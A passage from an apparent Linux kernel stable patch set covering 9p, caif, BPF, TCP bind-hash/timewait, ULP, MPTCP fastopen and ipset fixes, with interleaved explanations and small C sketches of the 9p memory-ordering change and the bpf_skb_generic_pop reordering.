++	if (READ_ONCE(req->status) == REQ_STATUS_ERROR) {
+ 		p9_debug(P9_DEBUG_ERROR, "req_status error %d\n", req->t_err);
+ 		err = req->t_err;
+ 	}
+@@ -811,7 +812,7 @@ static struct p9_req_t *p9_client_zc_rpc(struct p9_client *c, int8_t type,
+ 			p9_client_flush(c, req);
+ 
+ 		/* if we received the response anyway, don't signal error */
+-		if (req->status == REQ_STATUS_RCVD)
++		if (READ_ONCE(req->status) == REQ_STATUS_RCVD)
+ 			err = 0;
+ 	}
+ recalc_sigpending:
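
The 9p hunks convert every cross-thread access of req->status to
READ_ONCE()/WRITE_ONCE(); the ordering itself still comes from the
pre-existing smp_wmb()/smp_rmb() pairs, the annotations just turn each access
into a single, untearable load or store. In C11 terms that is a relaxed
atomic access plus explicit fences; a sketch (the busy-wait stands in for
wait_event_killable(); requires C11 <threads.h>, e.g. glibc >= 2.28):

#include <stdatomic.h>
#include <stdio.h>
#include <threads.h>

enum { REQ_STATUS_SENT = 1, REQ_STATUS_RCVD = 2 };

struct req {
	int err;		/* payload, written before the status flip */
	atomic_int status;	/* plays the role of req->status */
};

/* Completion side: publish the payload, then flip status.  Relaxed
 * store + release fence is the C11 spelling of smp_wmb(); WRITE_ONCE(). */
static int complete(void *arg)
{
	struct req *r = arg;

	r->err = 0;
	atomic_thread_fence(memory_order_release);
	atomic_store_explicit(&r->status, REQ_STATUS_RCVD,
			      memory_order_relaxed);
	return 0;
}

int main(void)
{
	struct req r = { .err = -1 };
	thrd_t t;

	atomic_store_explicit(&r.status, REQ_STATUS_SENT,
			      memory_order_relaxed);
	thrd_create(&t, complete, &r);

	/* Waiter side: one-shot relaxed loads (READ_ONCE()), then an
	 * acquire fence before trusting the payload -- the smp_rmb()
	 * p9_client_rpc() already had. */
	while (atomic_load_explicit(&r.status, memory_order_relaxed) <
	       REQ_STATUS_RCVD)
		;
	atomic_thread_fence(memory_order_acquire);
	printf("err = %d\n", r.err);

	thrd_join(t, NULL);
	return 0;
}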
+diff --git a/net/9p/trans_fd.c b/net/9p/trans_fd.c
+index 07db2f436d44b..5a1aecf7fe487 100644
+--- a/net/9p/trans_fd.c
++++ b/net/9p/trans_fd.c
+@@ -202,11 +202,11 @@ static void p9_conn_cancel(struct p9_conn *m, int err)
+ 
+ 	list_for_each_entry_safe(req, rtmp, &m->req_list, req_list) {
+ 		list_move(&req->req_list, &cancel_list);
+-		req->status = REQ_STATUS_ERROR;
++		WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	}
+ 	list_for_each_entry_safe(req, rtmp, &m->unsent_req_list, req_list) {
+ 		list_move(&req->req_list, &cancel_list);
+-		req->status = REQ_STATUS_ERROR;
++		WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	}
+ 
+ 	spin_unlock(&m->req_lock);
+@@ -467,7 +467,7 @@ static void p9_write_work(struct work_struct *work)
+ 
+ 		req = list_entry(m->unsent_req_list.next, struct p9_req_t,
+ 			       req_list);
+-		req->status = REQ_STATUS_SENT;
++		WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 		p9_debug(P9_DEBUG_TRANS, "move req %p\n", req);
+ 		list_move_tail(&req->req_list, &m->req_list);
+ 
+@@ -676,7 +676,7 @@ static int p9_fd_request(struct p9_client *client, struct p9_req_t *req)
+ 		return m->err;
+ 
+ 	spin_lock(&m->req_lock);
+-	req->status = REQ_STATUS_UNSENT;
++	WRITE_ONCE(req->status, REQ_STATUS_UNSENT);
+ 	list_add_tail(&req->req_list, &m->unsent_req_list);
+ 	spin_unlock(&m->req_lock);
+ 
+@@ -703,7 +703,7 @@ static int p9_fd_cancel(struct p9_client *client, struct p9_req_t *req)
+ 
+ 	if (req->status == REQ_STATUS_UNSENT) {
+ 		list_del(&req->req_list);
+-		req->status = REQ_STATUS_FLSHD;
++		WRITE_ONCE(req->status, REQ_STATUS_FLSHD);
+ 		p9_req_put(client, req);
+ 		ret = 0;
+ 	}
+@@ -732,7 +732,7 @@ static int p9_fd_cancelled(struct p9_client *client, struct p9_req_t *req)
+ 	 * remove it from the list.
+ 	 */
+ 	list_del(&req->req_list);
+-	req->status = REQ_STATUS_FLSHD;
++	WRITE_ONCE(req->status, REQ_STATUS_FLSHD);
+ 	spin_unlock(&m->req_lock);
+ 
+ 	p9_req_put(client, req);
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index 6ff706760676e..e9a830c69058c 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -507,7 +507,7 @@ dont_need_post_recv:
+ 	 * because doing if after could erase the REQ_STATUS_RCVD
+ 	 * status in case of a very fast reply.
+ 	 */
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+ 		goto send_error;
+@@ -517,7 +517,7 @@ dont_need_post_recv:
+ 
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+-	req->status = REQ_STATUS_ERROR;
++	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	kfree(c);
+ 	p9_debug(P9_DEBUG_ERROR, "Error %d in rdma_request()\n", err);
+ 
+diff --git a/net/9p/trans_virtio.c b/net/9p/trans_virtio.c
+index e757f06013043..3f3eb03cda7d6 100644
+--- a/net/9p/trans_virtio.c
++++ b/net/9p/trans_virtio.c
+@@ -263,7 +263,7 @@ p9_virtio_request(struct p9_client *client, struct p9_req_t *req)
+ 
+ 	p9_debug(P9_DEBUG_TRANS, "9p debug: virtio request\n");
+ 
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ req_retry:
+ 	spin_lock_irqsave(&chan->lock, flags);
+ 
+@@ -469,7 +469,7 @@ p9_virtio_zc_request(struct p9_client *client, struct p9_req_t *req,
+ 			inlen = n;
+ 		}
+ 	}
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ req_retry_pinned:
+ 	spin_lock_irqsave(&chan->lock, flags);
+ 
+@@ -532,9 +532,10 @@ req_retry_pinned:
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+ 	kicked = 1;
+ 	p9_debug(P9_DEBUG_TRANS, "virtio request kicked\n");
+-	err = wait_event_killable(req->wq, req->status >= REQ_STATUS_RCVD);
++	err = wait_event_killable(req->wq,
++			          READ_ONCE(req->status) >= REQ_STATUS_RCVD);
+ 	// RERROR needs reply (== error string) in static data
+-	if (req->status == REQ_STATUS_RCVD &&
++	if (READ_ONCE(req->status) == REQ_STATUS_RCVD &&
+ 	    unlikely(req->rc.sdata[4] == P9_RERROR))
+ 		handle_rerror(req, in_hdr_len, offs, in_pages);
+ 
+diff --git a/net/9p/trans_xen.c b/net/9p/trans_xen.c
+index aaa5fd364691b..cf1b89ba522b4 100644
+--- a/net/9p/trans_xen.c
++++ b/net/9p/trans_xen.c
+@@ -157,7 +157,7 @@ again:
+ 			      &masked_prod, masked_cons,
+ 			      XEN_9PFS_RING_SIZE(ring));
+ 
+-	p9_req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(p9_req->status, REQ_STATUS_SENT);
+ 	virt_wmb();			/* write ring before updating pointer */
+ 	prod += size;
+ 	ring->intf->out_prod = prod;
+@@ -212,7 +212,7 @@ static void p9_xen_response(struct work_struct *work)
+ 			dev_warn(&priv->dev->dev,
+ 				 "requested packet size too big: %d for tag %d with capacity %zd\n",
+ 				 h.size, h.tag, req->rc.capacity);
+-			req->status = REQ_STATUS_ERROR;
++			WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 			goto recv_error;
+ 		}
+ 
+diff --git a/net/caif/cfctrl.c b/net/caif/cfctrl.c
+index cc405d8c7c303..8480684f27625 100644
+--- a/net/caif/cfctrl.c
++++ b/net/caif/cfctrl.c
+@@ -269,11 +269,15 @@ int cfctrl_linkup_request(struct cflayer *layer,
+ 	default:
+ 		pr_warn("Request setup of bad link type = %d\n",
+ 			param->linktype);
++		cfpkt_destroy(pkt);
+ 		return -EINVAL;
+ 	}
+ 	req = kzalloc(sizeof(*req), GFP_KERNEL);
+-	if (!req)
++	if (!req) {
++		cfpkt_destroy(pkt);
+ 		return -ENOMEM;
++	}
++
+ 	req->client_layer = user_layer;
+ 	req->cmd = CFCTRL_CMD_LINK_SETUP;
+ 	req->param = *param;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index a368edd9057c7..0c2666e041d3c 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -3184,15 +3184,18 @@ static int bpf_skb_generic_push(struct sk_buff *skb, u32 off, u32 len)
+ 
+ static int bpf_skb_generic_pop(struct sk_buff *skb, u32 off, u32 len)
+ {
++	void *old_data;
++
+ 	/* skb_ensure_writable() is not needed here, as we're
+ 	 * already working on an uncloned skb.
+ 	 */
+ 	if (unlikely(!pskb_may_pull(skb, off + len)))
+ 		return -ENOMEM;
+ 
+-	skb_postpull_rcsum(skb, skb->data + off, len);
+-	memmove(skb->data + len, skb->data, off);
++	old_data = skb->data;
+ 	__skb_pull(skb, len);
++	skb_postpull_rcsum(skb, old_data + off, len);
++	memmove(skb->data, old_data, off);
+ 
+ 	return 0;
+ }
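
The bpf_skb_generic_pop() fix reorders the work so the pull happens first:
skb->data moves forward by @len, and the saved old_data pointer keeps the
checksum fixup and the memmove() aimed at the original bytes. A toy buffer
version of the same reordering (struct pkt is a stand-in, not an skb):

#include <stdio.h>
#include <string.h>

struct pkt {
	char buf[32];
	char *data;	/* like skb->data */
};

/* Remove @len bytes at offset @off: advance the data pointer first,
 * then shift the leading @off bytes up using the pre-pull pointer. */
static void pop(struct pkt *p, size_t off, size_t len)
{
	char *old_data = p->data;

	p->data += len;				/* __skb_pull() */
	/* checksum fixup over old_data + off would go here
	 * (skb_postpull_rcsum() in the kernel) */
	memmove(p->data, old_data, off);	/* keep the first @off bytes */
}

int main(void)
{
	struct pkt p = { .buf = "AABBBBCC" };

	p.data = p.buf;
	pop(&p, 2, 4);			/* drop "BBBB", keep "AA" + "CC" */
	printf("%s\n", p.data);		/* -> AACC */
	return 0;
}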
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 4a34bc7cb15ed..647b3c6b575ef 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -173,22 +173,40 @@ static bool inet_bind_conflict(const struct sock *sk, struct sock *sk2,
+ 	return false;
+ }
+ 
++static bool __inet_bhash2_conflict(const struct sock *sk, struct sock *sk2,
++				   kuid_t sk_uid, bool relax,
++				   bool reuseport_cb_ok, bool reuseport_ok)
++{
++	if (sk->sk_family == AF_INET && ipv6_only_sock(sk2))
++		return false;
++
++	return inet_bind_conflict(sk, sk2, sk_uid, relax,
++				  reuseport_cb_ok, reuseport_ok);
++}
++
+ static bool inet_bhash2_conflict(const struct sock *sk,
+ 				 const struct inet_bind2_bucket *tb2,
+ 				 kuid_t sk_uid,
+ 				 bool relax, bool reuseport_cb_ok,
+ 				 bool reuseport_ok)
+ {
++	struct inet_timewait_sock *tw2;
+ 	struct sock *sk2;
+ 
+ 	sk_for_each_bound_bhash2(sk2, &tb2->owners) {
+-		if (sk->sk_family == AF_INET && ipv6_only_sock(sk2))
+-			continue;
++		if (__inet_bhash2_conflict(sk, sk2, sk_uid, relax,
++					   reuseport_cb_ok, reuseport_ok))
++			return true;
++	}
+ 
+-		if (inet_bind_conflict(sk, sk2, sk_uid, relax,
+-				       reuseport_cb_ok, reuseport_ok))
++	twsk_for_each_bound_bhash2(tw2, &tb2->deathrow) {
++		sk2 = (struct sock *)tw2;
++
++		if (__inet_bhash2_conflict(sk, sk2, sk_uid, relax,
++					   reuseport_cb_ok, reuseport_ok))
+ 			return true;
+ 	}
++
+ 	return false;
+ }
+ 
+@@ -1182,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
+ }
+ EXPORT_SYMBOL(inet_csk_prepare_forced_close);
+ 
++static int inet_ulp_can_listen(const struct sock *sk)
++{
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++
++	if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
++		return -EINVAL;
++
++	return 0;
++}
++
+ int inet_csk_listen_start(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_sock *inet = inet_sk(sk);
+ 	int err;
+ 
++	err = inet_ulp_can_listen(sk);
++	if (unlikely(err))
++		return err;
++
+ 	reqsk_queue_alloc(&icsk->icsk_accept_queue);
+ 
+ 	sk->sk_ack_backlog = 0;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 3cec471a2cd2f..67f5e54408020 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -116,6 +116,7 @@ static void inet_bind2_bucket_init(struct inet_bind2_bucket *tb,
+ #endif
+ 		tb->rcv_saddr = sk->sk_rcv_saddr;
+ 	INIT_HLIST_HEAD(&tb->owners);
++	INIT_HLIST_HEAD(&tb->deathrow);
+ 	hlist_add_head(&tb->node, &head->chain);
+ }
+ 
+@@ -137,7 +138,7 @@ struct inet_bind2_bucket *inet_bind2_bucket_create(struct kmem_cache *cachep,
+ /* Caller must hold hashbucket lock for this tb with local BH disabled */
+ void inet_bind2_bucket_destroy(struct kmem_cache *cachep, struct inet_bind2_bucket *tb)
+ {
+-	if (hlist_empty(&tb->owners)) {
++	if (hlist_empty(&tb->owners) && hlist_empty(&tb->deathrow)) {
+ 		__hlist_del(&tb->node);
+ 		kmem_cache_free(cachep, tb);
+ 	}
+@@ -1103,15 +1104,16 @@ ok:
+ 	/* Head lock still held and bh's disabled */
+ 	inet_bind_hash(sk, tb, tb2, port);
+ 
+-	spin_unlock(&head2->lock);
+-
+ 	if (sk_unhashed(sk)) {
+ 		inet_sk(sk)->inet_sport = htons(port);
+ 		inet_ehash_nolisten(sk, (struct sock *)tw, NULL);
+ 	}
+ 	if (tw)
+ 		inet_twsk_bind_unhash(tw, hinfo);
++
++	spin_unlock(&head2->lock);
+ 	spin_unlock(&head->lock);
++
+ 	if (tw)
+ 		inet_twsk_deschedule_put(tw);
+ 	local_bh_enable();
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 66fc940f9521a..1d77d992e6e77 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -29,6 +29,7 @@
+ void inet_twsk_bind_unhash(struct inet_timewait_sock *tw,
+ 			  struct inet_hashinfo *hashinfo)
+ {
++	struct inet_bind2_bucket *tb2 = tw->tw_tb2;
+ 	struct inet_bind_bucket *tb = tw->tw_tb;
+ 
+ 	if (!tb)
+@@ -37,6 +38,11 @@ void inet_twsk_bind_unhash(struct inet_timewait_sock *tw,
+ 	__hlist_del(&tw->tw_bind_node);
+ 	tw->tw_tb = NULL;
+ 	inet_bind_bucket_destroy(hashinfo->bind_bucket_cachep, tb);
++
++	__hlist_del(&tw->tw_bind2_node);
++	tw->tw_tb2 = NULL;
++	inet_bind2_bucket_destroy(hashinfo->bind2_bucket_cachep, tb2);
++
+ 	__sock_put((struct sock *)tw);
+ }
+ 
+@@ -45,7 +51,7 @@ static void inet_twsk_kill(struct inet_timewait_sock *tw)
+ {
+ 	struct inet_hashinfo *hashinfo = tw->tw_dr->hashinfo;
+ 	spinlock_t *lock = inet_ehash_lockp(hashinfo, tw->tw_hash);
+-	struct inet_bind_hashbucket *bhead;
++	struct inet_bind_hashbucket *bhead, *bhead2;
+ 
+ 	spin_lock(lock);
+ 	sk_nulls_del_node_init_rcu((struct sock *)tw);
+@@ -54,9 +60,13 @@ static void inet_twsk_kill(struct inet_timewait_sock *tw)
+ 	/* Disassociate with bind bucket. */
+ 	bhead = &hashinfo->bhash[inet_bhashfn(twsk_net(tw), tw->tw_num,
+ 			hashinfo->bhash_size)];
++	bhead2 = inet_bhashfn_portaddr(hashinfo, (struct sock *)tw,
++				       twsk_net(tw), tw->tw_num);
+ 
+ 	spin_lock(&bhead->lock);
++	spin_lock(&bhead2->lock);
+ 	inet_twsk_bind_unhash(tw, hashinfo);
++	spin_unlock(&bhead2->lock);
+ 	spin_unlock(&bhead->lock);
+ 
+ 	refcount_dec(&tw->tw_dr->tw_refcount);
+@@ -93,6 +103,12 @@ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+ 	hlist_add_head(&tw->tw_bind_node, list);
+ }
+ 
++static void inet_twsk_add_bind2_node(struct inet_timewait_sock *tw,
++				     struct hlist_head *list)
++{
++	hlist_add_head(&tw->tw_bind2_node, list);
++}
++
+ /*
+  * Enter the time wait state. This is called with locally disabled BH.
+  * Essentially we whip up a timewait bucket, copy the relevant info into it
+@@ -105,17 +121,28 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 	const struct inet_connection_sock *icsk = inet_csk(sk);
+ 	struct inet_ehash_bucket *ehead = inet_ehash_bucket(hashinfo, sk->sk_hash);
+ 	spinlock_t *lock = inet_ehash_lockp(hashinfo, sk->sk_hash);
+-	struct inet_bind_hashbucket *bhead;
++	struct inet_bind_hashbucket *bhead, *bhead2;
++
+ 	/* Step 1: Put TW into bind hash. Original socket stays there too.
+ 	   Note, that any socket with inet->num != 0 MUST be bound in
+ 	   binding cache, even if it is closed.
+ 	 */
+ 	bhead = &hashinfo->bhash[inet_bhashfn(twsk_net(tw), inet->inet_num,
+ 			hashinfo->bhash_size)];
++	bhead2 = inet_bhashfn_portaddr(hashinfo, sk, twsk_net(tw), inet->inet_num);
++
+ 	spin_lock(&bhead->lock);
++	spin_lock(&bhead2->lock);
++
+ 	tw->tw_tb = icsk->icsk_bind_hash;
+ 	WARN_ON(!icsk->icsk_bind_hash);
+ 	inet_twsk_add_bind_node(tw, &tw->tw_tb->owners);
++
++	tw->tw_tb2 = icsk->icsk_bind2_hash;
++	WARN_ON(!icsk->icsk_bind2_hash);
++	inet_twsk_add_bind2_node(tw, &tw->tw_tb2->deathrow);
++
++	spin_unlock(&bhead2->lock);
+ 	spin_unlock(&bhead->lock);
+ 
+ 	spin_lock(lock);
+diff --git a/net/ipv4/tcp_ulp.c b/net/ipv4/tcp_ulp.c
+index 9ae50b1bd8444..05b6077b9f2c3 100644
+--- a/net/ipv4/tcp_ulp.c
++++ b/net/ipv4/tcp_ulp.c
+@@ -139,6 +139,10 @@ static int __tcp_set_ulp(struct sock *sk, const struct tcp_ulp_ops *ulp_ops)
+ 	if (sk->sk_socket)
+ 		clear_bit(SOCK_SUPPORT_ZC, &sk->sk_socket->flags);
+ 
++	err = -EINVAL;
++	if (!ulp_ops->clone && sk->sk_state == TCP_LISTEN)
++		goto out_err;
++
+ 	err = ulp_ops->init(sk);
+ 	if (err)
+ 		goto out_err;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 1dbc625372595..e97465f0c6672 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -1673,6 +1673,8 @@ static void mptcp_set_nospace(struct sock *sk)
+ 	set_bit(MPTCP_NOSPACE, &mptcp_sk(sk)->flags);
+ }
+ 
++static int mptcp_disconnect(struct sock *sk, int flags);
++
+ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msghdr *msg,
+ 				  size_t len, int *copied_syn)
+ {
+@@ -1683,9 +1685,9 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 	lock_sock(ssk);
+ 	msg->msg_flags |= MSG_DONTWAIT;
+ 	msk->connect_flags = O_NONBLOCK;
+-	msk->is_sendmsg = 1;
++	msk->fastopening = 1;
+ 	ret = tcp_sendmsg_fastopen(ssk, msg, copied_syn, len, NULL);
+-	msk->is_sendmsg = 0;
++	msk->fastopening = 0;
+ 	msg->msg_flags = saved_flags;
+ 	release_sock(ssk);
+ 
+@@ -1699,6 +1701,8 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 		 */
+ 		if (ret && ret != -EINPROGRESS && ret != -ERESTARTSYS && ret != -EINTR)
+ 			*copied_syn = 0;
++	} else if (ret && ret != -EINPROGRESS) {
++		mptcp_disconnect(sk, 0);
+ 	}
+ 
+ 	return ret;
+@@ -2367,7 +2371,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+ 		if (ssk->sk_state == TCP_LISTEN) {
+ 			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(ssk);
++			mptcp_subflow_queue_clean(sk, ssk);
+ 			inet_csk_listen_stop(ssk);
+ 		}
+ 		__tcp_close(ssk, 0);
+@@ -3000,6 +3004,14 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
++	/* We are on the fastopen error path. We can't call straight into the
++	 * subflows cleanup code due to lock nesting (we are already under
++	 * msk->firstsocket lock). Do nothing and leave the cleanup to the
++	 * caller.
++	 */
++	if (msk->fastopening)
++		return 0;
++
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+ 	mptcp_stop_timer(sk);
+@@ -3566,7 +3578,7 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 	/* if reaching here via the fastopen/sendmsg path, the caller already
+ 	 * acquired the subflow socket lock, too.
+ 	 */
+-	if (msk->is_sendmsg)
++	if (msk->fastopening)
+ 		err = __inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags, 1);
+ 	else
+ 		err = inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 6a09ab99a12de..62e9ff237b6e8 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -286,7 +286,7 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			is_sendmsg:1;
++			fastopening:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -614,7 +614,7 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 613f515fedf0a..9d3701fdb2937 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1733,7 +1733,7 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_ssk)
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+ {
+ 	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+ 	struct mptcp_sock *msk, *next, *head = NULL;
+@@ -1782,8 +1782,23 @@ void mptcp_subflow_queue_clean(struct sock *listener_ssk)
+ 
+ 		do_cancel_work = __mptcp_close(sk, 0);
+ 		release_sock(sk);
+-		if (do_cancel_work)
++		if (do_cancel_work) {
++			/* lockdep will report a false positive ABBA deadlock
++			 * between cancel_work_sync and the listener socket.
++			 * The involved locks belong to different sockets WRT
++			 * the existing AB chain.
++			 * Using a per socket key is problematic as key
++			 * deregistration requires process context and must be
++			 * performed at socket disposal time, in atomic
++			 * context.
++			 * Just tell lockdep to consider the listener socket
++			 * released here.
++			 */
++			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+ 			mptcp_cancel_work(sk);
++			mutex_acquire(&listener_sk->sk_lock.dep_map,
++				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
++		}
+ 		sock_put(sk);
+ 	}
+ 
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index e7ba5b6dd2b7c..46ebee9400dab 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -1698,9 +1698,10 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 		ret = set->variant->uadt(set, tb, adt, &lineno, flags, retried);
+ 		ip_set_unlock(set);
+ 		retried = true;
+-	} while (ret == -EAGAIN &&
+-		 set->variant->resize &&
+-		 (ret = set->variant->resize(set, retried)) == 0);
++	} while (ret == -ERANGE ||
++		 (ret == -EAGAIN &&
++		  set->variant->resize &&
++		  (ret = set->variant->resize(set, retried)) == 0));
+ 
+ 	if (!ret || (ret == -IPSET_ERR_EXIST && eexist))
+ 		return 0;
+diff --git a/net/netfilter/ipset/ip_set_hash_ip.c b/net/netfilter/ipset/ip_set_hash_ip.c
+index 75d556d71652d..24adcdd7a0b16 100644
+--- a/net/netfilter/ipset/ip_set_hash_ip.c
++++ b/net/netfilter/ipset/ip_set_hash_ip.c
+@@ -98,11 +98,11 @@ static int
+ hash_ip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 	      enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ip4 *h = set->data;
++	struct hash_ip4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ip4_elem e = { 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip = 0, ip_to = 0, hosts;
++	u32 ip = 0, ip_to = 0, hosts, i = 0;
+ 	int ret = 0;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -147,14 +147,14 @@ hash_ip4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 
+ 	hosts = h->netmask == 32 ? 1 : 2 << (32 - h->netmask - 1);
+ 
+-	/* 64bit division is not allowed on 32bit */
+-	if (((u64)ip_to - ip + 1) >> (32 - h->netmask) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+-	for (; ip <= ip_to;) {
++	for (; ip <= ip_to; i++) {
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_ip4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 		if (ret && !ip_set_eexist(ret, flags))
+ 			return ret;
+diff --git a/net/netfilter/ipset/ip_set_hash_ipmark.c b/net/netfilter/ipset/ip_set_hash_ipmark.c
+index 153de3457423e..a22ec1a6f6ec8 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipmark.c
++++ b/net/netfilter/ipset/ip_set_hash_ipmark.c
+@@ -97,11 +97,11 @@ static int
+ hash_ipmark4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipmark4 *h = set->data;
++	struct hash_ipmark4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipmark4_elem e = { };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0;
++	u32 ip, ip_to = 0, i = 0;
+ 	int ret;
+ 
+ 	if (tb[IPSET_ATTR_LINENO])
+@@ -148,13 +148,14 @@ hash_ipmark4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		ip_set_mask_from_to(ip, ip_to, cidr);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+-	for (; ip <= ip_to; ip++) {
++	for (; ip <= ip_to; ip++, i++) {
+ 		e.ip = htonl(ip);
++		if (i > IPSET_MAX_RANGE) {
++			hash_ipmark4_data_next(&h->next, &e);
++			return -ERANGE;
++		}
+ 		ret = adtfn(set, &e, &ext, &ext, flags);
+ 
+ 		if (ret && !ip_set_eexist(ret, flags))
+diff --git a/net/netfilter/ipset/ip_set_hash_ipport.c b/net/netfilter/ipset/ip_set_hash_ipport.c
+index 7303138e46be1..10481760a9b25 100644
+--- a/net/netfilter/ipset/ip_set_hash_ipport.c
++++ b/net/netfilter/ipset/ip_set_hash_ipport.c
+@@ -105,11 +105,11 @@ static int
+ hash_ipport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 		  enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
+ {
+-	const struct hash_ipport4 *h = set->data;
++	struct hash_ipport4 *h = set->data;
+ 	ipset_adtfn adtfn = set->variant->adt[adt];
+ 	struct hash_ipport4_elem e = { .ip = 0 };
+ 	struct ip_set_ext ext = IP_SET_INIT_UEXT(set);
+-	u32 ip, ip_to = 0, p = 0, port, port_to;
++	u32 ip, ip_to = 0, p = 0, port, port_to, i = 0;
+ 	bool with_ports = false;
+ 	int ret;
+ 
+@@ -173,17 +173,18 @@ hash_ipport4_uadt(struct ip_set *set, struct nlattr *tb[],
+ 			swap(port, port_to);
+ 	}
+ 
+-	if (((u64)ip_to - ip + 1)*(port_to - port + 1) > IPSET_MAX_RANGE)
+-		return -ERANGE;
+-
+ 	if (retried)
+ 		ip = ntohl(h->next.ip);
+ 	for (; ip <= ip_to; ip++) {
+ 		p = retried && ip == ntohl(h->next.ip) ? ntohs(h->next.port)
+ 						       : port;
